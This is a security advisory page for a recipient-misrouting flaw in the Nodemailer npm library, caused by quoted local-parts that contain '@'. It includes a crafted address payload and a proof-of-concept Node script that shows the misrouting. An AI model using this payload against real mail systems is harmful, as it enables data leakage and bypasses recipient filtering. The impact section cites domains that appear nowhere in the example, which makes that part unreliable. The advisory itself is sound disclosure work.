GHSA-mm7p-fcc7-pg87
Suggest an improvement- Source
- https://github.com/advisories/GHSA-mm7p-fcc7-pg87
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-mm7p-fcc7-pg87/GHSA-mm7p-fcc7-pg87.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-mm7p-fcc7-pg87
- Downstream
- Related
- Published
- 2025-10-07T13:42:02Z
- Modified
- 2025-10-07T13:42:02Z
- Severity
-
- 5.5 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
- Details
-
The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.
Payload:
"xclow3n@gmail.com x"@internal.domainUsing the following code to send mailconst nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })();Running the script and seeing how this mail is parsed according to RFC
Parsed email: { address: '"xclow3n@gmail.com x"@internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' }But the email is sent to
xclow3n@gmail.com<img width="2128" height="439" alt="Image" src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d" />
Impact:
Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.
Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.
Potential compliance issue: Violates RFC 5321/5322 parsing rules.
Domain based access control bypass in downstream applications using your library to send mails
Recommendations
Fix parser to correctly treat quoted local-parts per RFC 5321/5322.
Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.
- Database specific
{ "severity": "MODERATE", "github_reviewed": true, "nvd_published_at": null, "github_reviewed_at": "2025-10-07T13:42:02Z", "cwe_ids": [ "CWE-20", "CWE-436" ] }- References
Affected packages
npm / nodemailer
Package
- Name
- nodemailer
- View open source insights on deps.dev
- Purl
- pkg:npm/nodemailer